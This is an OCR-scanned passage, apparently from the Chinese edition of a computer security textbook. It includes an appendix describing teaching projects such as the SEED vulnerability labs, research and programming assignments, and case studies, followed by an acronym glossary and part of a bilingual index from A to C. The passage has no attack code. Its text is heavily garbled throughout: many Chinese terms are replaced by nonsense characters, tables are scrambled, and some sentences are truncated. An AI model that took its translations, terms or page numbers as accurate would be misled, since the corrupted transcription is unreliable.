何 进 行人 侵 操 作 ， 这 对 理解 如 何 使 用 这 些 练 习 非 常 重要 ， 因 为 其 中 还 使 用 了 一 些 直 观 的 截屏 . 
， 这 个 项 目 是 由 达科他 州 州立 大 学 的 Sreekanth Malladi 教授 设计 的 。 


A.2 实验 室 练习 项 目 


普度 大 学 的 Sanjay Rao 教授 和 Ruben Torres 教授 准备 了 一 套 实 验 室 练习 方案 ， 包 含 在 IRC 
中 。 这 些 实现 项 目 是 基于 Linux 平台 设计 的 ， 但 也 适用 于 任何 UNIX 平台。 这些 实验 室 练 习 项 
目 提供 了 在 实现 安全 功能 和 应 用 中 的 真实 的 实际 体验 。 


A3 安全 教育 (SEED) 项 目 


SEED SRA RAW EOF HAS a, SRR Ree. RE VE 
效 大 学 (Syracuse University) 的 Wenliang Du 教授 为 其 他 教师 所 设计 的 [DU11]。SEED 实验 项 
目的 设计 不 需要 专门 的 实体 的 实验 室 ， 也 不 需要 配备 专门 的 设备 。 所 有 的 SEED 实验 都 可 以 在 
学 生 自 己 的 个 人 电脑 上 或 普通 的 机 房 中 完成 。 这 个 系列 包括 如 下 三 类 实验 练习 : 
e 漏洞 与 攻击 实验 : 这 12 个 实验 涵盖 了 许多 常见 的 漏洞 和 攻击 行为 。 在 每 一 个 实验 当中 ， 
学 生 将 面 对 一 个 包含 隐藏 漏洞 的 系统 (或 程序 )。 根 据 一 些 提示 线索 ， 学 生 必 须发 现 这 
些 漏洞 ， 然 后 设计 一 些 策 略 来 利用 这 些 漏洞 。 学 生 们 也 需要 论证 防御 攻击 方法 的 正确 
性 ,评价 当前 通常 的 补救 措施 和 它们 的 效果 。 
e 探究 实验 : 这 9 个 实验 的 目标 是 通过 观察 、 操 作 和 探究 来 提高 学 生 的 学 习 能 力 ， 使 他 
们 能 够 理解 实际 系统 中 的 安全 原理 ， 同 时 学 生 也 获得 了 应 用 计算 机 安全 原理 来 分 析 并 
评估 系统 的 机 会 。 
e 设计 与 实现 实验 : 在 安全 教育 中 ， 学生 应 该 有 机 会 应 用 安全 原理 来 设计 和 实现 一 些 系 
统 。 有 意义 的 设计 任务 一 般 需 要 很 长 时 间 , 但 却 具有 很 大 的 挑战 性 ， 而 这 一 系列 的 9 
个 实验 正好 能 满足 这 个 需求 。 
K A-1 提供 了 SEED 库 中 与 书 中 相关 章节 对 应 的 30 个 实验 ， 以 及 学 生 完 成 实验 所 需要 的 
周 数 (假设 每 周 用 10 小 时 完成 实验 工作 )。 
表 A-1 SEED 实验 与 书 中 章节 的 关系 表 
时 间 ( 周 ) 章 节 
缓冲 区 洲 出 漏洞 
返回 库 函 数 攻击 
格式 化 字符 串 漏洞 
漏洞 与 攻击 实验 区 态 条 件 漏洞 
(基于 Linux 系统 ) Set-UID 设置 程序 漏洞 
改变 根 目录 沙 盒 漏洞 
伪造 跨 站 请 求 攻击 
跨 站 脚本 攻击 


将 
=> 
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时 间 ( 周 ) a 节 
SQL 注入 攻击 


并 
i 
将 
i 





基于 容量 的 (Capability-based) 连接 控制 (Minix) 
加 密 文件 系统 (Minix) 

地 址 空间 随机 化 (Minix) 

集 随机 UID 沙 盒 (Minix ) 


时 间 ( 周 ) 
la al 
漏洞 与 攻击 实验 点 击 支持 攻击 ï | 
ne nes yy 2 
2 
am | e 
ee o ': | 
wa ë o |， 
me | > 
mi E 
mx ee | 。 
ECE 
: 
’ 
设计 与 实现 实验 4 
基于 容量 的 (Copabiloyr based) 连接 控制 (Minin) | 3 
0 文人 系统 im | 
Mn) | 
AM UD wea (Minis) | s 


依据 章节 顺序 组 织 的 上 述 实 验 的 链接 ， 可 以 在 教材 配套 网 站 ， 通 过 教师 资源 链接 ( 即 
williamstallings.com/ComputerSecurity) 进行 访问 。 每 个 实验 包括 学 生 指 导 、 相 关 文 献 和 一 些 实 
验 需要 的 软件 。 而 且 ， 这 个 网 站 还 为 教师 提供 了 一 个 链接 ， 用 于 获取 教师 手册 。 


A.4 研究 项 目 


进行 一 项 研究 项 目 ， 不 仅 可 以 使 学 生 加 猴 对 谍 符 所 学 概念 的 理解 ， 而 且 能 够 教 给 学 生 一 些 
研究 技能 。 这 些 项 目 通 常 是 文献 研究 ， 还 包括 通过 Internet 调查 相关 供应 商 产 品 、 实 验 室 研 究 
活动 和 一 些 致力 于 标准 化 的 工作 。 这 些 项 目 可 以 由 一 个 小 组 承担 ， 对 于 比较 小 的 项 目 ， 也 可 以 
分 配给 个 人 。 无论 是 哪 一 种 情况 ， 最 好 是 能 够 提早 把 小 组 的 研究 计划 书 拿 给 指导 教师 ， 这 样 教 
师 才 有 充分 的 时 间 来 评估 项 目的 主题 和 难度 是 否 适合 学 生 。 学 生 提 交 的 研究 项 目 应 该 包括 以 下 
内 容 : 

© 研究 计划 书 的 格式 

© 最 终 报告 的 格式 

o 中 期 和 最 终结 题 的 时 间 表 
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e 项 目 可 能 的 主题 列表 

学 生 们 可 以 从 IRC 提供 的 主题 列表 中 选择 一 个 ， 也 可 以 自己 设计 提出 合适 的 项 目 。 在 教 
师 的 补充 材料 中 ， 包 括 了 研究 计划 书 的 建议 格式 和 最 终 报 告 的 格式 ， 还 列 出 了 一 些 可 能 的 研 
究 主题 。 

教师 补充 材料 中 的 研究 和 编程 项 目 是 由 以 下 这 些 人 建议 和 提供 的 : Henning Schulzrinne (sf 
伦比 亚 大 学 )、Cetin Kaya Koc (4K) NIK), David M. Balenson (可 信 信 息 系 统 公 司 和 乔 
治 … 华盛顿 大 学 )、Dan Wallach ( 赖 斯 大 学 ) 和 David Evans (弗吉尼亚 大 学 )。 


A.5 编程 项 目 


编程 项 目 是 非常 有 用 的 教学 工具 。 独 立 完 成 一 个 编程 项 目 ， 而 这 个 项 目 并 非 是 现 有 安全 工 
有 具 的 一 部 分 ， 具有 如 下 吸引 人 的 特点 : 

1. 教师 可 以 选择 很 多 密码 编码 学 和 网 络 安全 方面 的 概念 来 布置 该 项 目 。 

2. 学生 可 以 在 任何 一 台 机 器 上 用 任何 语言 进行 编程 ; 这 些 项 目 是 平台 无 关 和 语言 无 关 的 . 

3. 教师 不 需要 为 学 生 独 立 进 行 的 项 目下 载 、 安 装 和 配置 任何 特定 的 基础 环境 。 

对 于 项 目的 大 小 同样 也 没有 什么 限制 。 较 大 的 项 目 可 以 给 学 生 更 多 的 成 就 感 ， 能 力 较 差 或 
者 缺乏 组 织 技能 的 学 生 可 能 会 因此 被 落 在 后 面 。 较 大 的 项 目 通常 会 引导 那些 优秀 的 学 生 投 入 更 
多 的 精力 。 较 小 的 项 目 可 以 着 眼 于 从 概念 到 代码 的 转化 率 ， 就 是 说 在 这 样 的 项 目 中 ， 可 以 更 多 
地 要 求学 生 将 概念 用 代码 实现 或 通过 编程 来 理解 概念 。 而 且 由 于 小 项 目 涉及 的 主题 范围 大 ， 这 
可 以 帮助 学 生 有 机 会 接触 到 更 广 的 知识 领域 。 

就 像 在 人 研 究 项 目 中 要 求 的 那样 ， 学 生 们 也 要 首先 提交 一 份 计划 书 。 学 生 提 交 的 内 容 应 该 包 
括 上 一 节 中 所 提 到 的 那些 内 容 。 在 教师 的 补充 材料 中 包含 了 12 个 可 供 选 择 的 编程 项 目 。 

以 下 人 员 提 供 了 IRC 中 建议 的 研究 和 编程 项 目 : Henning Schulzrinne (哥伦比亚 大 学 )、 
Cetin Kaya Koc ( 俄 勒 站 州立 大 学 ) 和 David M. Balenson (可 信和 信息 系统 公司 和 乔治 " 华 盛 
顿 大 学 ) 。 


A.6 实际 的 安全 评估 

分 析 一 个 现 有 组 织 的 基础 设施 和 实践 ( 即 其 使 用 情况 ) 是 培养 学 生 安全 评估 技能 的 最 好 途 
径 之 一 。 在 IRC 中 ， 对 需要 进行 的 安全 评估 任务 进行 了 描述 。 学 生 们 可 以 以 个 人 或 者 小 组 为 
单位 ， 选 择 一 个 合适 的 小 型 或 中 型 组 织 或 机 构 。 学 生 们 然后 去 与 该 组 织 的 关键 人 员 见 面 和 交 
流 ， 从 而 能 够 对 安全 风险 评估 做 出 合适 的 选择 并 重新 审查 自己 面临 的 任务 ， 因 为 这 些 都 与 该 
组 织 的 IT 基础 设施 和 实践 有 关 。 最 终 ， 他 们 会 提出 合适 的 改革 意见 来 改善 该 组 织 的 IT 安全 状 
况 。 这 些 活动 能 够 帮助 学 生 们 提高 对 安全 实践 的 认识 ， 以 及 分 析 这 些 实践 并 提出 改善 意见 的 
能 力 。 


A7 防火墙 项 目 


网 络 防火 墙 的 应 用 对 于 初学 的 学 生来 说 是 非常 困难 的 。IRC 中 包含 了 可 视 化 的 网 络 防火 墙 
工具 ， 可 以 用 来 展示 和 教授 网 络 安 全 和 防火 墙 配置 。 这 个 工具 意 在 教授 并 帮助 学 生 加 深 对 一 些 
关键 概念 的 理解 ， 包 括 边界 防火 墙 的 用 法 和 目的 、 分 隔 的 子 网 的 用 途 、 数 据 包 过 滤 的 目的 和 简 
单数 据 包 过 滤 防 火 墙 的 弱点 等 概念 。 

IRC 中 包含 了 一 个 轻便 的 jar 格式 的 文件 ， 也 包括 了 一 系列 练习 。 这 些 工具 和 练习 都 是 由 
美国 空军 军官 学 校 开 发 的 。 
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A.8 案例 学 习 
拥有 案例 学 习 的 教学 可 以 提高 学 生 的 学 习 积 极 性 。IRC 中 包含 了 如 下 几 个 领域 中 的 案例 


学 习 : 
防火 墙 
事件 啊 应 
物理 安全 
风险 
安全 政策 
e 虚拟 化 
每 个 案例 学 习 都 包括 学 习 目 标 、 案 例 描 述 和 一 系列 与 案例 相关 的 讨论 题目 。 每 个 案例 学 习 
都 基于 现实 世界 的 情况 ， 并且 包含 一 些 描述 案例 的 论文 或 者 报告 。 
这 些 案 例 学 习 的 内 容 是 由 北 卡罗来纳 农工 州立 大 学 (North Carolina A&T State University ) 
开发 的 。 


AQ 阅读 /报告 作业 


男 一 个 使 学 生 加 深 对 课本 概念 的 理解 且 能 教 给 学 生 研究 经 验 的 有 效 方法 是 ， 让 学 生 研 读 一 
些 需 要 阅读 和 分 析 的 论文 。IRC 中 列 出 了 一 些 可 以 推荐 给 学 生 的 论文 ， 这 些 论 文 依据 章节 顺序 
组 织 。 优 质 内 容 Web 站 点 提供 了 这 些 论文 的 副本 。IRC 中 也 有 关于 如 何 进行 阅读 的 建议 信息 。 


A.10 与 作 作 业 


写作 作业 对 技术 原理 (如 网 络 安全 ) 的 学 习 有 多 方面 的 效果 。 跨 学 科 写 作 ( WAC: Writing 
Across the Curriculum) 运动 ( http://wac.colostate.edu) 的 拥护 者 声称 ， 写 作对 促进 学 习 非 常 有 
益 。 写 作 可 以 使 人 对 于 特定 主题 有 更 加 细致 和 完整 的 思考 。 另 外 ， 写 作 还 能 够 帮助 学 生 克 服用 
狭隘 的 个 人 眼光 看 问题 的 倾 问 ， 就 是 只 了 解 表面 的 现象 或 者 只 学 习 解 决 问题 的 方法 而 不 广泛 次 
入 地 理解 问题 的 主旨 。 

在 IRC 中 ， 提 供 了 按 章 节 组 织 的 很 多 的 写作 作业 。 教 师 最 终 可 能 发 现 ， 这 是 他 们 教学 过 
程 中 最 重要 的 一 个 环节 。 如 果 你 能 对 写作 这 部 分 的 内 容 提出 反馈 意见 或 者 另外 提供 一 些 写作 任 
务 ， 我 们 将 十 分 感谢 。 


A.11 计算 机 安全 教学 网 络 广播 


教材 配套 网 站 williamstallings.com/ComputerSecurity (教师 资源 链接 ) 提供 了 一 个 方便 的 网 
络 广播 站 点 目录 ， 以 提高 课程 的 教学 效果 。 教 师 可 以 自己 选择 ,或 者 学 生 也 可 以 自己 选择 一 个 
或 多 个 视频 观看 ， 并 且 写 出 视频 的 分 析 或 者 报告 。 
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'。 3DES (Triple Data Encryption Standard), = REINA tHe 

ABAC (Attribute-Based Access Control)， 基 于 属性 的 访问 控制 

AES (Advanced Encryption Standard )， 高 级 加 密 标 准 

AH (Authentication Header)， 认 证 头 

ANSI (American National Standards Institute )， 美 国 国家 标准 委员 会 
ATM (Automatic Teller Machine)， 目 动 柜 员 机 

CBC (Cipher Block Chaining)， 密 码 分 组 链接 

CC (Common Criteria)， 通 用 标准 

CFB (Cipher Feedback), #4 Jx tit 

CMAC (Cipher-Based Message Authentication Code)， 基 于 密码 的 消息 认证 人 码 
DAC (Discretionary Access Control), A EDIPE til 

DBMS (DataBase Management System)， 数 据 库 管理 系统 

DDoS (Distributed Denial of Service)， 分 布 式 拒绝 服务 攻击 

DES (Data Encryption Standard)， 数 据 加 密 标 准 

DMZ (Demilitarized Zone), WAK. / 非 军 事 区 

DoS (Denial of Service)， 拒 绝 服务 

DSA (Digital Signature Algorithm)， 数 宇 签 名 算法 

DSS (Digital Signature Standard)， 数 字 签 名 标准 

ECB (Electronic Codebook)， 电 子 密码 本 

ESP (Encapsulating Security Payload), HE #42 4X fay 

FIPS (Federal Information Processing Standard), (美国 ) 联邦 信息 处 理 标 准 
IAB (Internet Architecture Board), Internet 体系 结构 委员 会 

ICMP (Internet Control Message Protocol), Internet 控制 报 文 协议 

IDS (Intrusion Detection System)， 和 人 侵 检 测 系统 

IETF (Internet Engineering Task Force), Internet 工程 任务 组 

IP (Internet Protocol), Internet 协议 

IPsec (IP Security), IP 安全 

ISO (International Organization for Standardization)， 国 际 标准 化 组 织 
ITU (International Telecommunication Union)， 国 际 电信 联盟 

ITU-T (ITU Telecommunication Standardization Sector)，ITU 电信 标准 化 部 门 
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OFB (Output Feedback)， 输 出 反馈 

PIN (Personal Identification Number)， 个 人 标识 码 
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RSA (Rivest-Shamir-Adleman), RSA 算法 
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SHS (Secure Hash Standard)， 安 全 散 列 标准 
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SQL (Structured Query Language )， 结 构 化 查询 语言 

SSL (Secure Sockets Layer)， 安 全 套 接 字 层 

TCP (Transmission Control Protocol)， 传 输 探 制 协议 

TLS (Transport Layer Security)， 传 输 层 安全 

TPM (Trusted Platform Module )， 可 依 平 台 模 块 

UDP (User Datagram Protocol)， 用 户 数据 报 协议 
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Account logon events (账号 登录 事件 )，559，561 
Account management (账号 管理 )，561 
Accreditation (信赖 )，15-16，499 
ACM Code of Ethics and Professional Conduct ( if 
算 机 伦理 与 职业 行为 准则 )，599 
Active attacks (主动 攻击 )，9，14-15 
Active directory (AD, 活动 目录 ),411，561 
Activity (活动 )，277 
Actuator (执行 希 )，445 
Address space (地 址 空间 )，195，320，328，346-348 ， 
350, 353, 552, 556, 569 
Address space randomization (地 址 空间 随机 化 )， 
347-348 
Add Round Key stage ( 轮 密 钥 加 阶段 )，613-615 
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Ad Hoc Committee on Responsible Computing (尽责 
计算 特别 委员 会 )，601 
Ad hoc networks (Adhoc 网 络 )，702 
Adleman, Len, 49, 647 
Administrative management domain (ADMD, 行政 
管理 域 )，666 
Administrator (SHB ), 165, 277 
Advanced (高 级 的 )，187 
Advanced Encryption Standard(AES， 高 级 加 密 标准 )， 
31, 33-35, 413, 559, 606, 611, 613-619, 628 
add round key transformation ( 轮 密 钥 加 变换 )，618 
AES Encryption Round (AES 加 密 轮 )，615 
encryption and decryption algorithm (加 密 和 解密 
算法 )，613 
key expansion algorithm ( 密 钥 扩张 算法 )，619 
mix column transformation ( 列 混 消 变换 )，618 
overall structure of (整体 结构 )，613 
overview (概览 )，613-615 
S-boxes (S- 盒 )，616 
shift row transformation ( 行 移 位 变换 )，616，618 
SubBytes transformation (SubBytes 变换 )，616 
substitutions and permutation ( 代 换 和 置换 )，613 
Advanced Persistent Threats ( APT， 高 级 持续 性 威 
胁 )，187-188 
Adversary (threat agent) (攻击 者 ， 敌 手 ) 8, 10, 18, 
20-21, 24, 67, 71, 82, 83, 93-97, 101, 654 
Adware (J 74x), 199, 201-201t, 314t, 582t 
Agentless program (无 代理 程序 )，574-575 
Agent program (代理 程序 )，575 
AH information (AH 信息 )，679 
AITP Standard of Conduct (AITP 行为 标准 )，600 
Alarm processor (警报 处 理 器 )，551 
Alert (警报 )，277 
Alerting (42%), 573 
Alert Protocol (报警 协议 )，670 
Algorithms (算法 )，585 
correct implementation of (正确 的 实现 )，374-376 
correspondence between machine language and (与 
机 妖 语 言 一 致 )，376 
Alternative message formats( 可 用 的 信息 格式 )，563 
Amplification attacks (放大 攻击 )，242-243，246 
Amplifier attacks (放大 器 攻击 )，234 
Analysis approaches (分 析 方 法 )，259-262 
Analyzers (4; #1 #it), 256, 277 


AND-node (与 结 点 )，22 
Anomaly detection (EW 4M), 160-161, 261, 271, 
308, 552, 573 
attacks suitable for (攻击 适 于 )，271 
detection phase (检测 阶段 )，260 
knowledge-based analysis (基于 知识 的 分 析 )，260 
machine-learning analysis (机 器 学 习 分 析 )，260 
SPA and (状态 协议 分 析 )，272 
statistical analysis (统计 分 析 )，260 
training phase (训练 阶段 )，260 
Anonymity (匿名 者 )，S92 
Anonymous (匿名 的 )，253 
Answer to reset (ATR) message (响应 复位 信息 )，84 
Antireplay window ( 反 重 放 窗 口 )，679 
Anti-tamper and detection ( 防 算 改 和 检测 )，453 
Application and service configuration (应 用 和 服务 
配置 )，408 
in Linux/Unix systems (Linux/Unix 系统 中 )，408 
in Windows systems (Windows 系统 中 )，411-412 
Application-based bandwidth attacks (基于 应 用 带 
te A Wa), 236-239, A JL Denial-of-service 
(DoS) attack 
SIP flood (SIP #EYZ ), 236-237 
Application-level audit trail (应 用 层 审 计 迹 )，$S6-S57 
Application-level gateway (应 用 层 网 关 )，297 
Application owner (应 用 程序 属 主 )，164 
Application security (应 用 程序 安全 ) 
application specific configuration (应 用 程序 特定 
配置 )，405 
encryption technology (加 密 技术 )，405-406 
Application traffic (应 用 流量 )，419 
Apprentice (学 徒 )，253 
Architectural works, copyrighted (建筑 设计 、 建 筑 
作品 ,有 版 权 的 )，584 
Archives (归档 )，407，551 
Artifacts (工件 或 手工 产品 )，601 
Artificial Neural Networks (ANN， 人 工 神经 网 络 ) 263 
Assessors (评估 人 )，139 
Assets of a computer system (计算 机 系统 资产 )，7， 
471-472 
threats and (威胁 )，11-15 
Association for Computing Machinery (ACM, [bx 
计算 机 协会 )，598-599 


Association of Information Technology Professionals 


(AITP) Standard of Conduct (信息 技术 专业 协 
会 行为 标准 )，598 
Assurance (保险 ,保障 ,保证 )，26，139，362，376， 
467 
evaluation and (评估 )，26 
level for user authentication (用 户 认 证 层 )， 
68-70, 136 
security auditing and (安全 审计 )，549 
Asymmetric encryption 〈( 非 对 称 加 密 )，31，49 
Asymmetric encryption algorithms ( 非 对 称 加 密 算法 )， 
49-50, AJL Public-key encryption/cryptosystem 
Atomic operation, software security (原子 操作 , 软件 
安全 )，387 
Attack agent (攻击 代理 )，207-208，234-235 
bots (僵尸 主机 )，207-208，220，238，303 
remote control facility (远程 控制 设备 )，208 
zombies (僵尸 )，186，207-208，235，247 
Attack kit (攻击 工具 包 ， 攻 击 套 件 )，186-187 
Attacks (攻击 )，76， 参 见 Countermeasures ; Denial- 
of-service (DoS) attack; Software security; SQL 
injection (SQLi) attack; Threats; Vulnerabilities 
amplification (XK), 242-243, 246 
amplifier (MAKE), 234 
application-based bandwidth (4t F M HH JE t Da ), 
236-239 
application layer reconnaissance and (应 用 层 侦 
Z), 271 
banner grabbing (标题 抓 取 )，272 
blended (混合 )，186 
bots (机 妖 人 )，601 
brute-force (ÆJ), 33-34, 43, 44, 76, 561, 612 
categories (38%!]), 673-675 
ciphertext-only (MEX), 607-608 
classic cross-site scripting (经 典 的 跨 站 脚本 )， 
391-392 
client (m), 96-97 
code injection (REDEA ), 367-368, 383 
command injection (命令 注入 )，366，392 
cross-site scripting (XSS， 跨 站 脚本 )，369-370 
cryptanalytic (密码 分 析 的 )，72 
defined (已 定义 的 )，8，9 
detecting (检测 )，9 
distributed denial-of-service ( DDoS， 分 布 式 拒绝 
服务 )，207，234-236 
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DNS amplification (DNS 放大 )，243 

Domain name system (DNS) (域名 系统 )，271 

drive-by-download (夹带 式 下 载 )，188，201-202 

flooding( 洪 泛 )，233-234 

on handshake protocol (握手 协议 )，673 

host (主机 )，97 

hypertext Transfer Protocol (HTTP)-based (基于 起 
文本 传输 协议 的 )，238-239，271 

ICMP flood (ICMP 洪 泛 )，233 

inband (#7), 158 

inferential (推理 )，159 

injection (YEA), 155-161, 364-368 

inside (AH), 9 

on Internet Relay Chat (IRC) networks (在 Internet 
中 继 聊 天 CIRC) 网 络 上 )，207 

man-in-the-middle (中间 人 )，656，702 

network layer reconnaissance and (网 络 层 侦 
2), 271 

network security (网 络 安全 )，14-15 

o 作 by-one( 差 一 错误 )，349 

offline dictionary (离线 字典 )，70-71 

other (其 他 )，673-674 

Out-of-band (44h), 160 

outside (外 部 )，9 

on PKI ( 公 钥 基础 设施 )，673 

popular password (流行 的 口令 )，71 

on record and application data protocols (记录 和 应 
用 数据 协议 )，673 

reflection (反射 )，239-242 

reflector (2H), 234, 239-242 

remote code injection〈 远 程 代 码 注 入 )，383 

replay ( 重 放 )，97 

scanning (HAt), 272 

security (Z£), 9, 14, 19, 22, 25 

software bugs (软件 缺陷 )，360 

source routing ( 源 路 径 )，295 

spear-phishing ( 鱼 又 式 网 络 钓鱼 )，210 

specific account (指定 的 账户 )，71 

SSL/TLS, 673-675 

suitable for anomaly detection (适用 于 异常 检 
il), 272 

SYN-FIN, 284 

SYN spoofing (SYN 欺骗)，230-233 

TCP SYN spoofing (TCP SYN 欺骗 )，232 
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threat consequences of (威胁 后 果 )，9-11 
tiny fragment (fi), 295 
transport layer reconnaissance and (传输 层 侦察 )， 
271 
Trojan horse (R=), 11, 96-97, 189, 199, 200, 
202, 211, 307 
= watering-hole (水 坑 )，204 
XSS ( 跨 站 脚本 )，369-370 
zero-day ( 0-day), 259, 261 
Attack surfaces (攻击 面 )，21-22 
Attack trees (攻击 树 )，22-24 
Attended biometric (BIO-A， 关 注 的 生物 特征 )，523 
Attribute-based access control ( ABAC， 基 于 属性 的 
访问 控制 )，109，126-132 
advantage of (优势 )，132 
attributes in (属性 )，126 
contrast with RBAC approach( 与 RBAC 方法 对 比 )，131 
flexibility of (灵活 性 )，127 
logical architecture (12 442i} #4) ), 128-129 
policies (il), 128-129 
policy model (策略 模型 )，129-132 
Attribute certificates (属性 证 书 )，693 
Attribute eXchange Network ( AXN， 属 性 交换 网 
络 )，138 
Attribute indexes (属性 索引 )，171 
Attribute providers (AP， 属 性 提供 者 )，139 
Attributes (属性 )，19，22，66，88，117，127，152- 
153, 166, 171, 229, 408, 559, 572, 693 
Audit (#771), 16, 108, ÆJ Security auditing 
Audit analysis (审计 分 析 )，552 
Audit analyzer (审计 分 析 器 )，55S1 
Audit and alarms model (X.816) (审计 和 警报 模 
型 )，550-551 
Audit archiver (审计 存档 器 )，551 
AUDIT CALL START，568 
Audit dispatcher (审计 调度 大 )，551 
AUDIT LOOKUP COMMAND, 568 
Auditors (审计 者 )，139 
Audit provider (审计 提供 器 )，551 
Audit recorder (审计 记录 器 )，550-551 
Audit (log file) records (审计 (日 志文 件 ) 记录 ) 262-263 
Audit records, host-based intrusion detection and ( 审 
计 记 录 ， 基 于 主机 的 人 侵 检 测 )，262-263 
Audit review (审计 复核 )，552，572 


Audit trail collector (审计 迹 收集 响 )，55] 
Audit trail examiner (审计 迹 检查 器 )，551 
Audit trails〈 审 计 迹 )，$56-5$58，571 
analysis (分 析 )，570-574 
review after an event (事件 后 复核 )，571 
Authenticated encryption (AE， 认 证 加 密 )，644-647 
Authenticated session (认证 会 话 )，24 
Authentication (AWE), 16, 107, 453, 589, 715, ÆJ 
Message Authentication, User Authentication 
access control and (访问 控制 )，107 
biometric (生物 特征 )，87-92 
digital user (数字 用 户 )，65-70 
hash function and (#4! PRX), 37-45 
message or data (信息 或 数据 )，37-42 
password-based (基于 口令 的 )，70-82 
process, steps for (过 程 ， 步 最 )，64 
public-key encryption ( 公 钥 加 密 )，41，47 
remote user (远程 用 户 )，92-95 
security issues for user (使 用 者 的 安全 问题 )，95-97 
token-based (基于 令 牌 的 )，82-87 
using message encryption (使 用 信息 加 密 )，38-44 
using symmetric encryption (使 用 对 称 加 密 )，37 
Authentication Header (AH， 认 证 头 )，679 
Authentication protocol (认证 协议 )，66，68，87 
challenge-response (挑战 - 应 答 )，84 
Diffie-Hellman key exchange ( Diffie-Hellman 密 
GACH), 654 
dynamic biometric (动态 生物 特征 )，95 
dynamic password generator (动态 口令 生成 器 )，83 
protocol type selection (PTS， 协 议 类 型 选择 )，84 
of a smart token (智能 令 牌 )，84，94 
static (静态 的 )，83 
static biometric (静态 生物 特征 )，95 
Authentication server (AS， 认 证 服务 器 )，686，721 
Authenticators (认证 符 )，96 
Authenticity ( 直 实 性 )，3-4，12，38，41，210，460， 
463, 472 
Authorization (#24), 107, 453-454 
access control and (访问 控制 )，107 
cascading (级 联 )，163-164 
Authorization functions (授权 功能 )，589 
Automatic response (自动 应 答 )，552 
Automatic teller machine (ATM， 自 动 柜员 机 )，82 
architectures (架构 )，100 


cardholder ( 持 卡 人 )，99 
issuer (发 行人 ， 发 行商 )，99 
processor (AbF#45), 100 
security problems for (安全 问题 )，99-102 
Autonomic enterprise security system (自主 的 企业 
ERF), 274 
Auto-rooter, 185 
Availability (可 用 性 ) 2-6, 9, 11-13, 15-16, 25, 
149, 167, 169, 184, 207, 225-226, 235, 
253, 402, 460, 463, 472, 481-482, 484, 
493, 504, 552-553, 562, 579 
Awareness (意识 )，16 
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B 
Backbone cabling (主干 电缆 )，174 
Backbone network (主干 网 络 )，447 
Backdoor (trapdoor) (后 门 )，10-11，185，198,，211， 
255, 314 
Background checks and screening of employees ( 员 
工 背景 审查 和 考察 )，535-536 
Backscatter traffic (Fz) Pitt), DoS, 230, 241 
Backup, data (备份 ， 数 据 )，407 
Banner grabbing attack (标题 抓 取 攻 击 )，272 
Barrier security (屏障 安全 )，708 
Baseline approach (基线 方法 )，466-467 
Baselining (基线 设置 )，573 
Base-rate fallacy (ERIR), 258-259 
behavior (47747), 258 
IDS problem of (IDS 问题 )，258-259 
Basic principles (基本 原则 ), 257-258 
Basic service set (BSS， 基 本 服务 集 )，711 
transition (过 渡 )，714 
Bastion host (RÆ E#L), 298-299 
Bayesian networks( 贝 叶 斯 网 络 )，261 
Bcrypt，74 
Behavior-blocking software (行为 阻止 软件 )，218 
Bernstein, Daniel ( 伯 因 斯坦， 丹尼尔 )，246 
Billing / payments (账单 / 支付 功能 )，589 
Biological viruses (生物 学 病毒 )，188 
Biometric (BIO， 生 物 特征 的 )，523 
Biometric authentication system (生物 特征 认证 系 
4), 97 
accuracy of (准确 性 )，89-92 
cost vs. accuracy (费用 与 准确 性 )，88 
dynamic biometric protocol (动态 生物 特征 协议 )， 
67,. 95 
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fingerprint patterns (指纹 模式 )，88 
generic (通用 的 )，90 
hand geometry systems ( 手 形 系统 )，88 
iris system (虹膜 系统 )，89，97-99 
operation of (操作 )，89 
personal identification number (PIN， 个 人 识别 
码 )，89，90 
physical characteristics of (身体 特征 )，88-89 
retinal (视网膜 )，88 
signature (签名 )，88 
static biometric protocol (静态 生物 特征 协议 )， 
67, 95 
using facial characteristics (使 用 面部 特征 )，88 
verification (identification) of (确认 (识别 ))，89 
voice pattern (语音 模式 )，88 
Biometric information (生物 特征 信息 )，86 
BIOS code (BIOS 代码 )，206 
BitLocker, Windows security ( BitLocker, Windows 
安全 )，413 
Blended attack( 混 合 攻击 )，186 
Blinding ( 盲 的 )，652 
Blind SQL injection ( Ẹ SQL YEA), 159-160 
Blizzard (4847), 511 
Block cipher encryption (分 组 加 密 算 法 )，36 
blowfish symmetric (河豚 对 称 )，74 
Block cipher modes of operation (分 组 密码 操作 模 
式 )，622-628 
Block ciphers〈 分 组 密码 )，33，35，609，611，619- 
620, 641 
Block encryption algorithms (分 组 加 密 算法 )，31， 
33-35, 606, 609 
Block reordering (分 组 重组 )，37 
Bloom filter (Bloom 过 滤器 )，80-82 
Blowfish symmetric block cipher (河豚 对 称 分 组 
密码 )，74 
Blue Pill rootkit ( 蓝 药 片 rootkit), 214, 402 
Boot sector infector (引导 扇 区 感染 )，192 
Botnet (僵尸 网 络 )，186，203，207，210，220，235， 
241 
Bots (P HL), 207-208, 220, 238, 303, 601 
uses (使 用 )，207 
Bourne shell, 335, 339, 340 
Bring-your-own-device (BYOD) policy ( 自 带 设备 策 
it), 706 
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Browser helper objects (BHO， 浏 览 器 助手 对 象 )，207 
Brunner, John (ASA, 289), 194 
Brute-force attack (JKG), 33, 34, 43, 76, 561, 
612 
BSD Syslog Protocol (BSD 系统 日 志 协 议 )，563 
Buffer overflow (rK eth ), 321 
attacks (Wits), 320-321, 325, 332, 335, 342, 346, 
‘348-354 
C code (C 代码 )，322 
compile-time defenses (编译 时 防御 )，342-346 
countermeasures (对 策 )，342-346 
definition (EX), 321 
example runs (实例 运行 )，322 
exploiting method (利用 漏洞 方法 )，324 
exploits (dail AFA), 307 
function call mechanisms (函数 调用 机 制 )，326-327 
global data area overflows (全 局 数据 区 溢出 )，353 
heap (〈 推 )，350-353 
input size and (输入 大 小 )，363 
no-execute (NX， 无 执行 )，347 
replacement stack frame ( 蔡 换 栈 帧 )，348-349 
return to system call (返回 到 系统 调用 )，349-350 
run-time defenses (运行 时 防御 )，346-348 
shellcode, 335-339 
stack (k), 325-342 
stack values (F&{H), 323 
Buffer overrun (缓冲 区 越界 )， 参 见 Buffer overflow 
BUFSIZ constant (BUFSIZ 常量 )，332 
Business continuity and disaster recovery (业务 连续 
性 和 灾难 恢复 )，442 
Business use only policy ( 仅 用 于 业务 的 策略 )，538 
C 
Calling function (Ji FW KX), 326 
Canary value (Canary {É ), 346 
Canonicalization (规范 化 )，372，393 
Capability (能 力 )，473 
Capability tickets (能 力 权证 )，111-112，693 
Card access number (CAN， 卡 接 人 号 )，85，87 
Card authentication key (CAK， 卡 认证 密 钥 )，524 
Cardholder unique identifier ( CHUID， 持 卡 人 唯一 
识别 码 )，523 
